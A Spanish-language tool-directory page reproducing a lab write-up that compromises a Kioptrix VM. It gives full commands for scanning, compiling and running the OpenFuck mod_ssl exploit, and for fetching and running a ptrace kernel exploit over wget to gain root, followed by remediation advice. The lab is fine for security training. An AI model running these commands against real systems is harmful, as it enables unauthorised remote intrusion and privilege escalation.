Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Binary-Exploitation-and-Kernel-Escalation — Aseguró el acceso a nivel raíz identificando y explotando configuraciones incorrectas y software desactualizado. Vulnerabilidad de desbordamiento de búfer en una versión desactualizada de mod_ssl (CVE-2002-0082). Posteriormente se logró la escalada de privilegios explotando una condición de carrera en la utilidad "ptrace" del kernel de Linux (CVE-2003-0127), | Kitploit
Herramientas/GitHubGitHub/anilkashyap01/binary-exploitation-and-kernel-escalation
Escalada de PrivilegiosReconocimientoEscaneo de PuertosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Labs y Práctica
GitHubanilkashyap01/binary-exploitation-and-kernel-escalation

Binary-Exploitation-and-Kernel-Escalation

Ver Repositorio
hace 4 mesesAún no revisado

Acerca de

Aseguró el acceso a nivel raíz identificando y explotando configuraciones incorrectas y software desactualizado. Vulnerabilidad de desbordamiento de búfer en una versión desactualizada de mod_ssl (CVE-2002-0082). Posteriormente se logró la escalada de privilegios explotando una condición de carrera en la utilidad "ptrace" del kernel de Linux (CVE-2003-0127),

Compartir

Binary-Exploitation-and-Kernel-Escalation

Acceso a nivel root asegurado mediante la identificación y explotación de configuraciones incorrectas y software desactualizado. Vulnerabilidad de desbordamiento de búfer en una versión desactualizada de mod_ssl (CVE-2002-0082). La escalada de privilegios se logró posteriormente explotando una condición de carrera en la utilidad "ptrace" del kernel de Linux (CVE-2003-0127).

Fase 1: Reconocimiento y Enumeración

El primer paso fue identificar la dirección IP del objetivo en la subred 192.168.56.0/24.

Descubrimiento de hosts:

sudo nmap -sn 192.168.56.0/24

Resultado: el objetivo fue identificado en 192.168.56.105.

Escaneo de puertos y enumeración de servicios:

Se ejecutó un escaneo exhaustivo con Nmap para identificar puertos abiertos, servicios en ejecución y detalles del sistema operativo.

sudo nmap -sS -sV -O -p- -oA lab_full_scan1 192.168.56.105

Hallazgos clave:

root@kitploit:~
Puerto 80/tcp y 443/tcp: Apache httpd 1.3.20 con mod_ssl/2.8.4 y OpenSSL/0.9.6b.

Puerto 22/tcp: OpenSSH 2.9p2.

Puerto 139/tcp: Samba smbd.

Detección de SO: Linux Kernel 2.4.X (probablemente 2.4.9 - 2.4.18).

La versión desactualizada de Apache y mod_ssl presentó de inmediato un vector de alta probabilidad para el acceso inicial.

Fase 2: Acceso Inicial (Explotación)

La base de datos de exploits mediante searchsploit confirmó que mod_ssl 2.8.4 es vulnerable a un desbordamiento de búfer remoto bien conocido.

searchsploit mod_ssl 2.8

Identifiqué el exploit OpenFuckV2.c (EDB-ID: 47080) como el payload más fiable para esta vulnerabilidad. Copié el exploit al host local y lo compilé con las bibliotecas criptográficas necesarias.

Compilación del exploit:

searchsploit -m 47080 gcc -o OpenFuck 47080.c -lcrypto

Ejecutar el binario compilado sin argumentos proporcionó una lista de offsets compatibles. Al comparar el offset con el SO y la versión de Apache específicos del objetivo (Red-Hat Linux, Apache 1.3.20), determiné que el offset correcto era 0x6b.

Ejecución:

./OpenFuck 0x6b 192.168.56.105 443 -c 40

El exploit forzó con éxito un desbordamiento de búfer, otorgando un shell con privilegios bajos como el usuario apache.

bash-2.05$ whoami apache

Fase 3: Escalada de Privilegios

Nota sobre la metodología: el exploit OpenFuck intenta descargar automáticamente un payload secundario de escalada de privilegios (ptrace-kmod.c) desde un servidor remoto mediante wget. Sin embargo, debido a que el entorno objetivo no tenía acceso a Internet saliente, este paso automatizado falló (resolviendo como Host not found). Me dirigí a la enumeración y explotación manual.

Enumeración del sistema:

bash-2.05$ uname -a Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

El sistema ejecutaba una versión del kernel altamente vulnerable: 2.4.7-10. La búsqueda de exploits dirigidos a este kernel de Linux específico reveló una vulnerabilidad local de escalada de privilegios que utiliza ptrace/kmod.

Preparación del payload:

Localicé el exploit localmente (EDB-ID: 3) y lo alojé mediante un servidor HTTP de Python en la máquina atacante para facilitar la transferencia.

Host atacante:

searchsploit -m 3 python3 -m http.server 8000

Máquina objetivo:

cd /tmp wget http://192.168.56.1:8000/3.c

El código fuente de 3.c se transfirió con éxito al directorio /tmp del objetivo. Lo compilé y ejecuté de forma nativa en la máquina objetivo.

Ejecución y compromiso de root:

gcc 3.c -o exploit

./exploit

whoami

root

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

La condición de carrera en ptrace se explotó con éxito, escalando privilegios del demonio apache a root. Se logró el compromiso total del sistema.

Fase 4: Remediación

Para asegurar este sistema contra las vulnerabilidades explotadas:

  1. Actualizar los servicios web: el servidor Apache debe actualizarse a las últimas versiones estables para parchear la vulnerabilidad de desbordamiento de búfer CVE-2002-0082, que permite la ejecución remota de código no autenticado.

  2. Parcheo del kernel: el kernel de Linux (2.4.7-10) es vulnerable a múltiples exploits locales de escalada de privilegios, incluida la condición de carrera de ptrace (kmod). El kernel del sistema operativo debe actualizarse a una versión moderna y compatible.

  3. Segmentación de red y filtrado de tráfico saliente: el servidor debe colocarse detrás de un firewall que restrinja el tráfico saliente innecesario. Si bien el wget automatizado falló en este laboratorio sin conexión, el filtrado de tráfico saliente evitaría que las aplicaciones web comprometidas descarguen payloads maliciosos secundarios desde Internet en un entorno en producción.

Descargar herramienta